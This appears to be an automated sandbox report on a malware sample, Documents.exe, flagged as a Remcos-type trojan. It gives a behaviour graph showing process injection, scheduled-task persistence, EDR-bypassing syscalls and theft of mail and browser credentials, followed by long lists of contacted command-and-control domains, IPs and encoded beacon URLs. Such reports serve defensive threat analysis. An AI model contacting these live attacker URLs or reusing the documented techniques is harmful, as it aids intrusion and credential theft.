                    Software Packing                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564384 Sample: Documents.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 59 www.lingdianyun29.xyz 2->59 61 www.6822662.xyz 2->61 63 16 other IPs or domains 2->63 75 Suricata IDS alerts for network traffic 2->75 77 Sigma detected: Scheduled temp file as task from temp location 2->77 79 Multi AV Scanner detection for submitted file 2->79 83 9 other signatures 2->83 10 Documents.exe 7 2->10         started        14 uFEeKIucsX.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 61->81 process4 file5 51 C:\Users\user\AppData\...\uFEeKIucsX.exe, PE32 10->51 dropped 53 C:\Users\...\uFEeKIucsX.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp2505.tmp, XML 10->55 dropped 57 C:\Users\user\AppData\...\Documents.exe.log, ASCII 10->57 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 10->93 95 Writes to foreign memory regions 10->95 97 Allocates memory in foreign processes 10->97 103 2 other signatures 10->103 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        99 Multi AV Scanner detection for dropped file 14->99 101 Machine Learning detection for dropped file 14->101 25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 vWFGbvOdxI.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 105 Found direct / indirect Syscall (likely to bypass EDR) 29->105 42 systray.exe 13 29->42         started        process11 signatures12 85 Tries to steal Mail credentials (via file / registry access) 42->85 87 Tries to harvest and steal browser information (history, passwords, etc) 42->87 89 Modifies the context of a thread in another process (thread injection) 42->89 91 3 other signatures 42->91 45 vWFGbvOdxI.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 hayaniya.org 192.185.147.100, 49882, 49888, 49894 OIS1US United States 45->65 67 www.learnnow.info 199.192.23.123, 50015, 50016, 50017 NAMECHEAP-NETUS United States 45->67 69 11 other IPs or domains 45->69 107 Found direct / indirect Syscall (likely to bypass EDR) 45->107 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Documents.exe24%ReversingLabsByteCode-MSIL.Trojan.Remcos
                    Documents.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\uFEeKIucsX.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\uFEeKIucsX.exe24%ReversingLabsByteCode-MSIL.Trojan.Remcos

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.6822662.xyz/shuiyechaoyang/0%Avira URL Cloudsafe
                    https://park.101datacenter.net/images/vendor-1/google_workspace.png0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/565f40599029.html0%Avira URL Cloudsafe
                    http://www.6822662.xyz/xiaotianyou/0%Avira URL Cloudsafe
                    https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/178b40599416.html0%Avira URL Cloudsafe
                    https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=ca0%Avira URL Cloudsafe
                    http://www.6822662.xyz/shuiyechaoyangh/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/9/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/0%Avira URL Cloudsafe
                    https://park.101datacenter.net/images/vendor-1/trustpilot.svg0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/069a299928.html0%Avira URL Cloudsafe
                    http://www.6822662.xyz/mingrihuaqiluo/0%Avira URL Cloudsafe
                    https://0dyos.com0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/830f499165.html0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/128c40599466.html0%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/1/0%Avira URL Cloudsafe
                    http://www.hayaniya.org/yf1h/0%Avira URL Cloudsafe
                    http://www.duskgazes.work/zs4o/?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    https://cs.deviceatlas-cdn.com/101dacs.js0%Avira URL Cloudsafe
                    https://park.101datacenter.net/images/vendor-1/icon/101domain.ico0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/14a40599580.html0%Avira URL Cloudsafe
                    https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm0%Avira URL Cloudsafe
                    https://park.101datacenter.net/images/vendor-1/google-reviews.svg0%Avira URL Cloudsafe
                    http://www.lingdianyun29.xyz/404o/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/927a399069.html0%Avira URL Cloudsafe
                    http://www.nieuws-july202488.sbs/30le/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/baishimolinair/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/yasendi/0%Avira URL Cloudsafe
                    http://www.learnnow.info/d5up/?QhKxhNP=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGr9kxI5wEfZ1g7ObOVlc/eoN6Msnk6zs6578MLwdAQ==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    http://www.030002449.xyz/cfqm/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/468c40599126.html0%Avira URL Cloudsafe
                    http://www.carpentry.club/jcsf/?QhKxhNP=NJIOohqps9aNaGk8Gv0x95TXV1ke4jY2ru9PIld0z7+iuCSmXzhmM46cxc5xGqvTMH7YV8ukdWwIlgb06ERZu+HhQde6PspHhBqQKwPZwv/EXFgjFQrkOjXlWxa7+IRGPg==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    http://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/2/0%Avira URL Cloudsafe
                    https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra0%Avira URL Cloudsafe
                    https://www.101domain.com/resource_center.htm0%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/7/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/gongdilan/0%Avira URL Cloudsafe
                    https://cs.deviceatlas-cdn.com/smartclick0%Avira URL Cloudsafe
                    http://www.carpentry.club/jcsf/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/lingcunaili/0%Avira URL Cloudsafe
                    https://park.101datacenter.net/css/fonts/LatoRegular.woff20%Avira URL Cloudsafe
                    http://www.6822662.xyz/ruocainaiyang/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/xidaoailiw/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/129d40599465.html0%Avira URL Cloudsafe
                    https://cs.deviceatlas-cdn.com0%Avira URL Cloudsafe
                    http://www.holytur.net/cs9k/?QhKxhNP=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZDtQplym5WCIjSXUngUJeAz/nR33NA1XQvWBI8EpRg==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    http://www.6822662.xyz/youtianzhenxi/0%Avira URL Cloudsafe
                    https://park.101datacenter.net0%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/10/0%Avira URL Cloudsafe
                    https://park.101datacenter.net/css/vendor-1.css?202409250508080%Avira URL Cloudsafe
                    https://park.101datacenter.net/css/fonts/LatoRegular.woff)0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/449a40599145.html0%Avira URL Cloudsafe
                    http://www.hasan.cloud/tur7/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/zuozuomumingxi/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/template/news/news10/css/layout.css0%Avira URL Cloudsafe
                    http://www.030002449.xyz/cfqm/?QhKxhNP=FHiNz6b6Wn9oKec3i10x/NxXWu4/t8kjzDy3bn44oOFoUWscXE4DzqYFgJdNnLXTrdZ+ESI+3Oq4E1BzotELfZv0FR4L9xniphkEx7BDvvGrYDhvMkPmWTEebCLVzsH5Qg==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    https://park.101datacenter.net/js/modernizr-webp.js?202409250508080%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/8/0%Avira URL Cloudsafe
                    https://park.101datacenter.net/css/fonts/LatoRegular.woff2)0%Avira URL Cloudsafe
                    http://www.lingdianyun29.xyz/404o/?QhKxhNP=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsK6uFZ8oMmHn4Vx5wOob/Qku77DXil1QxQESxukZTQ==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    http://www.losmason.shop/s15n/0%Avira URL Cloudsafe
                    https://park.101datacenter.net/images/vendor-1/park-back.webp0%Avira URL Cloudsafe
                    https://park.101datacenter.net/js/pricing.js?202409250508080%Avira URL Cloudsafe
                    http://hayaniya.org/yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/776b40598818.html0%Avira URL Cloudsafe
                    https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source0%Avira URL Cloudsafe
                    http://www.6822662.xyz/sitemap.xml0%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/5/0%Avira URL Cloudsafe
                    https://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/047a40599547.html0%Avira URL Cloudsafe
                    http://www.nieuws-july202488.sbs/30le/?QhKxhNP=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERWGJqvHJseYAxerz13ZcR6Qaw8dlP7tGoG6xZXENiQ==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/87c40599507.html0%Avira URL Cloudsafe
                    http://www.zrinorem-srumimit.sbs/xyvr/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/dnjw/0%Avira URL Cloudsafe
                    https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac0%Avira URL Cloudsafe
                    http://www.learnnow.info/d5up/0%Avira URL Cloudsafe
                    https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=carpentry.club&utm_0%Avira URL Cloudsafe
                    http://www.6822662.xyz/dnjw/?QhKxhNP=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfDz6ShsEoBWZb9ZpzTMPTjlue++bzVqPhWzfo/q89w==&Yby=d2ydCtHpb80%Avira URL Cloudsafe
                    http://www.6822662.xyz/jiuzhonghuannai/6/0%Avira URL Cloudsafe
                    http://www.zrinorem-srumimit.sbs/xyvr/?Yby=d2ydCtHpb8&QhKxhNP=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrrhC9s12l00lNHx4+XmTSfuGU54Az/E2dcdiA+66+g==0%Avira URL Cloudsafe
                    http://www.6822662.xyz/guchuanyizhi/0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/912f40598682.html0%Avira URL Cloudsafe
                    http://zrinorem-srumimit.sbs/0%Avira URL Cloudsafe
                    https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s0%Avira URL Cloudsafe
                    https://park.101datacenter.net/images/vendor-1/com.png0%Avira URL Cloudsafe
                    https://www.101domain.com/gmail_email_aliases.htm0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/068e399928.html0%Avira URL Cloudsafe
                    http://www.duskgazes.work/zs4o/0%Avira URL Cloudsafe
                    https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s0%Avira URL Cloudsafe
                    http://www.6822662.xyz/Dating/289d399707.html0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    nieuws-july202488.sbs
                    		162.0.215.33
                    		truetrue
                      		unknown
                      holytur.net
                      		185.106.208.3
                      		truefalse
                        		unknown
                        www.innovationpulse.tech
                        		75.2.103.23
                        		truetrue
                          		unknown
                          www.030002449.xyz
                          		161.97.142.144
                          		truetrue
                            		unknown
                            www.learnnow.info
                            		199.192.23.123
                            		truetrue
                              		unknown
                              www.carpentry.club
                              		52.60.87.163
                              		truetrue
                                		unknown
                                hayaniya.org
                                		192.185.147.100
                                		truetrue
                                  		unknown
                                  www.losmason.shop
                                  		104.18.73.116
                                  		truetrue
                                    		unknown
                                    www.lingdianyun29.xyz
                                    		121.43.155.35
                                    		truetrue
                                      		unknown
                                      www.zrinorem-srumimit.sbs
                                      		172.67.222.69
                                      		truetrue
                                        		unknown
                                        www.6822662.xyz
                                        		103.249.106.91
                                        		truetrue
                                          		unknown
                                          www.hasan.cloud
                                          		13.248.169.48
                                          		truetrue
                                            		unknown
                                            www.lovel.shop
                                            		13.248.169.48
                                            		truetrue
                                              		unknown
                                              duskgazes.work
                                              		3.33.130.190
                                              		truetrue
                                                		unknown
                                                www.nieuws-july202488.sbs
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.hayaniya.org
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.duskgazes.work
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.holytur.net
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.hayaniya.org/yf1h/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.duskgazes.work/zs4o/?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.lingdianyun29.xyz/404o/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.nieuws-july202488.sbs/30le/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.learnnow.info/d5up/?QhKxhNP=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGr9kxI5wEfZ1g7ObOVlc/eoN6Msnk6zs6578MLwdAQ==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.030002449.xyz/cfqm/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carpentry.club/jcsf/?QhKxhNP=NJIOohqps9aNaGk8Gv0x95TXV1ke4jY2ru9PIld0z7+iuCSmXzhmM46cxc5xGqvTMH7YV8ukdWwIlgb06ERZu+HhQde6PspHhBqQKwPZwv/EXFgjFQrkOjXlWxa7+IRGPg==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carpentry.club/jcsf/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.holytur.net/cs9k/?QhKxhNP=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZDtQplym5WCIjSXUngUJeAz/nR33NA1XQvWBI8EpRg==&Yby=d2ydCtHpb8false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.hasan.cloud/tur7/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.030002449.xyz/cfqm/?QhKxhNP=FHiNz6b6Wn9oKec3i10x/NxXWu4/t8kjzDy3bn44oOFoUWscXE4DzqYFgJdNnLXTrdZ+ESI+3Oq4E1BzotELfZv0FR4L9xniphkEx7BDvvGrYDhvMkPmWTEebCLVzsH5Qg==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.lingdianyun29.xyz/404o/?QhKxhNP=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsK6uFZ8oMmHn4Vx5wOob/Qku77DXil1QxQESxukZTQ==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.losmason.shop/s15n/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.nieuws-july202488.sbs/30le/?QhKxhNP=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERWGJqvHJseYAxerz13ZcR6Qaw8dlP7tGoG6xZXENiQ==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zrinorem-srumimit.sbs/xyvr/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.learnnow.info/d5up/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/dnjw/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/dnjw/?QhKxhNP=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfDz6ShsEoBWZb9ZpzTMPTjlue++bzVqPhWzfo/q89w==&Yby=d2ydCtHpb8true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zrinorem-srumimit.sbs/xyvr/?Yby=d2ydCtHpb8&QhKxhNP=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrrhC9s12l00lNHx4+XmTSfuGU54Az/E2dcdiA+66+g==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.duskgazes.work/zs4o/true
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabsystray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://park.101datacenter.net/images/vendor-1/google_workspace.pngsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/ac/?q=systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.6822662.xyz/xiaotianyou/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/jiuzhonghuannai/9/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/shuiyechaoyang/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_soursystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=casystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/565f40599029.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/178b40599416.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/shuiyechaoyangh/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://park.101datacenter.net/images/vendor-1/trustpilot.svgsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/mingrihuaqiluo/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/069a299928.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://0dyos.comvWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/830f499165.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/128c40599466.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/jiuzhonghuannai/1/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://cs.deviceatlas-cdn.com/101dacs.jssystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://park.101datacenter.net/images/vendor-1/icon/101domain.icosystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/14a40599580.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htmsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://park.101datacenter.net/images/vendor-1/google-reviews.svgsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/927a399069.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
